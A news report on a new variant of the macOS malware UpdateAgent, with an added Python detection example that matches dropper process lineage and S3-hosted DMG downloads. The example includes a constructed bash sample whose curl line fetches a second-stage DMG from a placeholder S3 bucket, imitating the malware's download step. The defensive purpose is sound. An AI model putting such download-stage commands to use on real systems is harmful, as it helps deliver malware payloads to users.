A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionality.
“Perhaps one of the most identifiable features of the malware is that it relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server,” researchers from Jamf Threat Labs said in a report.
UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections.
The newly discovered Swift-based dropper masquerades as Mach-O binaries named “PDFCreator” and “ActiveDirectory” that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed.
“The main difference [between the two executables] is that it reaches out to a different URL from which it should load a bash script,” the researchers noted.
These bash scripts, named “activedirec.sh” or “bash_qolveevgclr.sh”, include a URL pointing to Amazon S3 buckets to download and run a second-stage disk image (DMG) file on the compromised endpoint.
“The continued development of this malware shows that its authors continue to remain active, trying to reach as many users as possible,” the researchers said.
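The infection chain described above (a dropper binary named PDFCreator or ActiveDirectory running a fetched bash script, which in turn pulls a DMG from an S3 bucket) lends itself to two simple detection heuristics. The following is an added example, not code from the report or from Jamf; the process-event format, the sample events and the sample script are constructed for illustration.

```python
"""Heuristic detection for the UpdateAgent dropper chain described in the article.

Two defender-side checks:
  1. Process lineage: a binary named like the dropper spawning bash on a script
     whose name matches one of the reported script names.
  2. Script content: a bash script that downloads a .dmg from an Amazon S3 URL.
The ProcEvent record type and all sample data below are constructed for this example.
"""
import re
from dataclasses import dataclass

DROPPER_NAMES = {"PDFCreator", "ActiveDirectory"}        # binary names from the report
SCRIPT_NAMES = {"activedirec.sh", "bash_qolveevgclr.sh"}  # script names from the report
# Any http(s) URL on an amazonaws.com host that ends in .dmg (assumed S3 hosting pattern).
S3_DMG_RE = re.compile(r'https?://\S*amazonaws\.com\S*\.dmg', re.IGNORECASE)


@dataclass
class ProcEvent:
    parent: str   # parent process image name
    image: str    # process image name
    args: list    # argv of the process


def lineage_hits(events):
    """Return (parent, script_path) pairs where a dropper-named process runs bash on a known script."""
    hits = []
    for ev in events:
        if ev.parent in DROPPER_NAMES and ev.image in ("bash", "sh"):
            for arg in ev.args:
                if arg.rsplit("/", 1)[-1] in SCRIPT_NAMES:
                    hits.append((ev.parent, arg))
    return hits


def s3_dmg_urls(script_text):
    """Return every S3-hosted .dmg URL referenced in a shell script."""
    return S3_DMG_RE.findall(script_text)


# Constructed process events: one matching the described chain, one benign.
SAMPLE_EVENTS = [
    ProcEvent("launchd", "PDFCreator", ["PDFCreator"]),
    ProcEvent("PDFCreator", "bash", ["bash", "/tmp/activedirec.sh"]),
    ProcEvent("Terminal", "bash", ["bash", "/Users/me/build.sh"]),
]

# Constructed script modelled on the reported second-stage fetch (bucket name is a placeholder).
SAMPLE_SCRIPT = """#!/bin/bash
URL="https://example-bucket.s3.amazonaws.com/stage2.dmg"
curl -s -o /tmp/stage2.dmg "$URL"
"""
```

Running `lineage_hits(SAMPLE_EVENTS)` flags only the PDFCreator-to-bash event, and `s3_dmg_urls(SAMPLE_SCRIPT)` returns the placeholder S3 URL; in practice the same checks would be fed from an EDR process log and from scripts quarantined at download time.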
Some parts of this article are sourced from:
thehackernews.com